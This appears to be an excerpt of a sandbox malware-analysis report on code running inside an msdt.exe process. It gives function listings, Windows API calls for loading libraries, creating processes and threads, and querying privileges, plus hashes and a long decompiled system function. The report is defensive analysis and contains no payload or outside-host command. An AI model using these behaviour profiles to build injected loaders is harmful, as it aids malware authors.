                                                                            • Instruction ID: 6ede4477cc222719cb4dbabd0764216e9835718822258818a6039ce565dce5cc
                                                                            • Opcode Fuzzy Hash: 538abed265c5d158ddd0c2efc6e16d8eadf2debc70b5946eeebfa6a3d8b33158
                                                                            • Instruction Fuzzy Hash: B23181B6605600ABCB15EF68C8A1FABB7F8BF48700F00811DFA1D5B242D730A555DBE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00097306, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 129 97306-97352 call 9a030 132 97358-973a8 call 9a100 call 89b50 call 93e60 129->132 133 9742c-97432 129->133 140 973b0-973c1 Sleep 132->140 141 973c3-973c9 140->141 142 97426-9742a 140->142 143 973cb-973f1 call 96f40 141->143 144 973f3-97413 141->144 142->133 142->140 145 97419-9741c 143->145 144->145 146 97414 call 97140 144->146 145->142 146->145
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 000973B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: e3de26e9ff7db19a0417be1a7243694edbd8bd4b58c9345105ccd2f2e2258560
                                                                            • Instruction ID: c6ceef22a0d089a4e690d8b682db16e470732d3895e2f0ddc093b5c735745df3
                                                                            • Opcode Fuzzy Hash: e3de26e9ff7db19a0417be1a7243694edbd8bd4b58c9345105ccd2f2e2258560
                                                                            • Instruction Fuzzy Hash: 80218172A05605ABCB10DF64C8A1FABB7A4FF88700F148119FA1D5B242D770A556DBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000988C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 155 988c0-988f1 call 991f0 RtlAllocateHeap
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(F5,?,00093CBF,00093CBF,?,00093546,?,?,?,?,?,00000000,00000000,?), ref: 000988ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID: F5
                                                                            • API String ID: 1279760036-1354453618
                                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                            • Instruction ID: 3bdb6fdd9e87b047b1469b2958488c167f5901a7df3b94af368b21a033afa763
                                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                            • Instruction Fuzzy Hash: 7FE012B1200208ABDB14EF99CC85EA777ACFF88750F118558BE085B242C630F910CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00098900, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 158 98900-98931 call 991f0 RtlFreeHeap
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 0009892D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID: .z`
                                                                            • API String ID: 3298025750-1441809116
                                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                            • Instruction ID: e173cf95a5ac2eb2f0bede8c32dec4c31e5bca9719e9474d996d1bc74e89b614
                                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                            • Instruction Fuzzy Hash: 17E046B1200208ABDB18EF99CC89EE777ACEF88750F018558FE085B252C630F910CAF0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00087314, Relevance: 3.2, APIs: 2, Instructions: 188threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 164 87314-87316 165 87318-87378 call 9a150 call 87290 call 999e0 164->165 166 872b2-872bc 164->166 182 87380-873b2 call 8d3e0 call 98790 165->182 167 872c3-872da call 93e60 166->167 168 872be call 89b50 166->168 174 872dc-872ee PostThreadMessageW 167->174 175 8730e-87312 167->175 168->167 177 8730d 174->177 178 872f0-8730b call 892b0 PostThreadMessageW 174->178 177->175 178->177 188 873b4-873bc 182->188 189 873e7-873ef 182->189 190 873be-873c5 188->190 191 873d6-873e0 188->191 190->191 192 873c7-873ce 190->192 191->182 193 873e2-873e5 191->193 192->191 194 873d0-873d4 192->194 195 8740d-8741f call 98720 193->195 194->191 196 873f0-8740a call 9a0d0 194->196 195->189 201 87421-8748c call 97fa0 195->201 196->195 201->189 204 87492-874ee call 97fe0 201->204 204->189 207 874f4-87541 call 99680 call 996a0 call 9a3c0 call 9a0d0 call 93a60 204->207
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872EA
                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008730B
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 20216d12b598d7dd3ab8ef6f9dc82bf46761b7aa7108745876e10788f12135c7
                                                                            • Instruction ID: db525ed048f640a50523bd3b642cc5f910bd28b563ca4b271d9a01607a013025
                                                                            • Opcode Fuzzy Hash: 20216d12b598d7dd3ab8ef6f9dc82bf46761b7aa7108745876e10788f12135c7
                                                                            • Instruction Fuzzy Hash: 6161A171A04209AFDB24EF64DC85BEBB7E8BB45300F10056DF95D97242DB70AA41DBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00087290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 218 87290-872da call 9a150 call 9ad30 call 89b50 call 93e60 227 872dc-872ee PostThreadMessageW 218->227 228 8730e-87312 218->228 229 8730d 227->229 230 872f0-8730b call 892b0 PostThreadMessageW 227->230 229->228 230->229
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872EA
                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008730B
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                                                            • Instruction ID: c9f3801c9264246f694cb4ebb2110608ca924a94960e7eeeadd2611c47b060f8
                                                                            • Opcode Fuzzy Hash: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                                                            • Instruction Fuzzy Hash: BA01DB31A8022877EB21B6949C03FFE776C6B41F51F150114FF04BA1C2E6D4AA0647F6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00089B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 428 89b50-89b79 call 9af80 431 89b7b-89b7e 428->431 432 89b7f-89b8d call 9b3a0 428->432 435 89b9d-89bae call 99730 432->435 436 89b8f-89b9a call 9b620 432->436 441 89bb0-89bc4 LdrLoadDll 435->441 442 89bc7-89bca 435->442 436->435 441->442
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089BC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                            • Instruction ID: 6be21db2e01ad6bdfd2057ebe30773d7d0aef07c0e2e3892c1cd6ef38e03a6ee
                                                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                            • Instruction Fuzzy Hash: 59011EB5E0020DBBDF10EAE4ED42FEDB7B8AB54708F0441A5E90897242F671EB14DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00098970, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 443 98970-989c8 call 991f0 CreateProcessInternalW
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000989C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                            • Instruction ID: 8f8d720702bca44fa8495978207ccdb00b5468ff596cbcfdfa1b4e43ee5a6535
                                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                            • Instruction Fuzzy Hash: B201AFB2210108ABCB54DF8DDC80EEB77ADAF8C754F158258BA0D97251C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00097440, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 446 97440-97468 call 93e60 449 9746a-97486 call 9d582 CreateThread 446->449 450 97487-9748c 446->450
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CD00,?,?), ref: 0009747C
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: d6830f6d31632154abbcedb5bbd99aa7626e937d2c32e0f59dd912f69b1dbb5f
                                                                            • Instruction ID: cf70ed0d8889029084224b074ff12f2092f9ca6736733930c81a7263dc1a1fe5
                                                                            • Opcode Fuzzy Hash: d6830f6d31632154abbcedb5bbd99aa7626e937d2c32e0f59dd912f69b1dbb5f
                                                                            • Instruction Fuzzy Hash: 5CE092333903143AE730659D9C03FE7B79CCB91B24F150026FA0DEB2C2D595F90152A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00097EE0, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlDosPathNameToNtPathName_U.NTDLL(00700069,00000000,00000000,00084965,00000000,00000000,00700069,?,00083B93), ref: 00097F11
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Path$NameName_
                                                                            • String ID:
                                                                            • API String ID: 3514427675-0
                                                                            • Opcode ID: 991622dfa8962ad2ab0fbcb377ea20e9540ada2c14e034a2f5a96e5b281a6e83
                                                                            • Instruction ID: 7d40bab9ad0abbdc887d54c330b51a098e263da9d547853703a13ac23a31dc82
                                                                            • Opcode Fuzzy Hash: 991622dfa8962ad2ab0fbcb377ea20e9540ada2c14e034a2f5a96e5b281a6e83
                                                                            • Instruction Fuzzy Hash: 3CE0E5B5600208ABCB14DF88CC85EA77BACEF88650F008458BA1897242C670F9108BE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00098A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFD2,0008CFD2,?,00000000,?,?), ref: 00098A90
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                            • Instruction ID: be68d532b7e68d26078d865cd4f364f759679e17a6e248d01e880f16462818d1
                                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                            • Instruction Fuzzy Hash: 38E01AB12002086BDB10DF49CC85EE737ADEF88750F018154BE0857242C930E8108BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0008D440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00087C93,?), ref: 0008D46B
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                            • Instruction ID: 7575cc7a2f0f989154bfc67930d540ce18896101a2080d37b197e39e4e145387
                                                                            • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                            • Instruction Fuzzy Hash: 72D0A7717543083BFA10FAA89C03F6633CC6B55B04F494064F949D73C3D960F9004561
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 02618788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 94%
                                                                            			E02618788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02618460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E025FE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0261718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02618460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0261718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02618460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02618460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02618460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0261718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E025FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E025F2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0260E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E025FE2A8(_t322,  &_v68, _v16);
								if(E02615553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0260E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E025FE2A8(_t322,  &_v68, _t236);
								if(E02615553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0261718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E025FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E025F2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0260E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E025FE2A8(_v12,  &_v68, _v16);
							if(E02615553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0260E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E025FE2A8(_t322,  &_v68, _t269);
							if(E02615553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0261718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E025FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E025F2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0260E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E025FE2A8(_v12,  &_v68, _v16);
						if(E02615553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0260E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E025FE2A8(_t322,  &_v68, _t296);
						if(E02615553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                            0x02618788
                                                                            0x02618788
                                                                            0x02618791
                                                                            0x02618794
                                                                            0x02618798
                                                                            0x0261879b
                                                                            0x0261879e
                                                                            0x026187a1
                                                                            0x026187a4
                                                                            0x026187a7
                                                                            0x026187aa
                                                                            0x026187af
                                                                            0x02661ad3
                                                                            0x02618b0a
                                                                            0x02618b0d
                                                                            0x02618b13
                                                                            0x02618b19
                                                                            0x02618b1f
                                                                            0x02618b25
                                                                            0x02618b2b
                                                                            0x02618b31
                                                                            0x02618b37
                                                                            0x02618b3d
                                                                            0x02618b46
                                                                            0x02618b46
                                                                            0x026187c6
                                                                            0x026187d0
                                                                            0x02661ae0
                                                                            0x02661ae6
                                                                            0x02661af8
                                                                            0x02661af8
                                                                            0x02661afd
                                                                            0x02661afe
                                                                            0x02661b01
                                                                            0x02661b06
                                                                            0x02661b06
                                                                            0x026187d6
                                                                            0x026187f2
                                                                            0x026187f7
                                                                            0x02618807
                                                                            0x0261880a
                                                                            0x0261880f
                                                                            0x02618810
                                                                            0x02618813
                                                                            0x02618818
                                                                            0x02618818
                                                                            0x0261882c
                                                                            0x02618831
                                                                            0x02618838
                                                                            0x02618908
                                                                            0x02618920
                                                                            0x026189f0
                                                                            0x02618a08
                                                                            0x02618af6
                                                                            0x02618af6
                                                                            0x02618af8
                                                                            0x02618afb
                                                                            0x02661beb
                                                                            0x02661beb
                                                                            0x02618b04
                                                                            0x02661bf8
                                                                            0x02661c0e
                                                                            0x02661c13
                                                                            0x02661c16
                                                                            0x02661c16
                                                                            0x02661bf8
                                                                            0x00000000
                                                                            0x02618b04
                                                                            0x02618a0e
                                                                            0x02618a11
                                                                            0x02618a14
                                                                            0x02618a15
                                                                            0x02618a18
                                                                            0x02618a22
                                                                            0x02618b59
                                                                            0x02618a28
                                                                            0x02618a3c
                                                                            0x02618a3c
                                                                            0x02618a42
                                                                            0x02661bb0
                                                                            0x02661b11
                                                                            0x02661b11
                                                                            0x00000000
                                                                            0x02618a48
                                                                            0x02618a51
                                                                            0x02618a5b
                                                                            0x02618a5e
                                                                            0x02618a61
                                                                            0x02618a69
                                                                            0x02618a69
                                                                            0x02618a6d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02618a74
                                                                            0x02618a7c
                                                                            0x02618a7d
                                                                            0x02618a91
                                                                            0x02618a93
                                                                            0x02618a93
                                                                            0x02618a98
                                                                            0x02618a9b
                                                                            0x02618aa1
                                                                            0x02618aa1
                                                                            0x02618aa4
                                                                            0x02618aaa
                                                                            0x02618ab1
                                                                            0x02618ac5
                                                                            0x02618ac7
                                                                            0x02618ac7
                                                                            0x02618ac5
                                                                            0x02618ace
                                                                            0x02661bc9
                                                                            0x02661bce
                                                                            0x02661bd2
                                                                            0x02661bd2
                                                                            0x02618ad8
                                                                            0x02618aeb
                                                                            0x02618aeb
                                                                            0x02618af0
                                                                            0x02618af4
                                                                            0x00000000
                                                                            0x02618af4
                                                                            0x02618a42
                                                                            0x02618926
                                                                            0x02618929
                                                                            0x0261892c
                                                                            0x0261892d
                                                                            0x02618930
                                                                            0x02618935
                                                                            0x0261893a
                                                                            0x02618b51
                                                                            0x02618940
                                                                            0x02618954
                                                                            0x02618954
                                                                            0x0261895a
                                                                            0x02661b63
                                                                            0x00000000
                                                                            0x02618960
                                                                            0x02618969
                                                                            0x02618973
                                                                            0x02618976
                                                                            0x02618979
                                                                            0x0261897e
                                                                            0x02618981
                                                                            0x02618981
                                                                            0x02618986
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02661b6e
                                                                            0x02661b74
                                                                            0x02661b7b
                                                                            0x02661b8f
                                                                            0x02661b91
                                                                            0x02661b91
                                                                            0x02661b99
                                                                            0x02661b9c
                                                                            0x02661ba2
                                                                            0x02661ba2
                                                                            0x0261898c
                                                                            0x02618992
                                                                            0x02618999
                                                                            0x026189ad
                                                                            0x02661ba8
                                                                            0x02661ba8
                                                                            0x026189ad
                                                                            0x026189b6
                                                                            0x026189c8
                                                                            0x026189cd
                                                                            0x026189d0
                                                                            0x026189d0
                                                                            0x026189d6
                                                                            0x026189e8
                                                                            0x026189e8
                                                                            0x026189ed
                                                                            0x00000000
                                                                            0x026189ed
                                                                            0x0261895a
                                                                            0x0261883e
                                                                            0x02618841
                                                                            0x02618844
                                                                            0x02618845
                                                                            0x02618848
                                                                            0x0261884d
                                                                            0x02618852
                                                                            0x02618b49
                                                                            0x02618858
                                                                            0x0261886c
                                                                            0x0261886c
                                                                            0x02618872
                                                                            0x02661b0e
                                                                            0x00000000
                                                                            0x02618878
                                                                            0x02618881
                                                                            0x0261888b
                                                                            0x0261888e
                                                                            0x02618891
                                                                            0x02618896
                                                                            0x02618899
                                                                            0x02618899
                                                                            0x0261889e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02661b21
                                                                            0x02661b27
                                                                            0x02661b2e
                                                                            0x02661b42
                                                                            0x02661b44
                                                                            0x02661b44
                                                                            0x02661b4c
                                                                            0x02661b4f
                                                                            0x02661b55
                                                                            0x02661b55
                                                                            0x026188a4
                                                                            0x026188aa
                                                                            0x026188b1
                                                                            0x026188c5
                                                                            0x02661b5b
                                                                            0x02661b5b
                                                                            0x026188c5
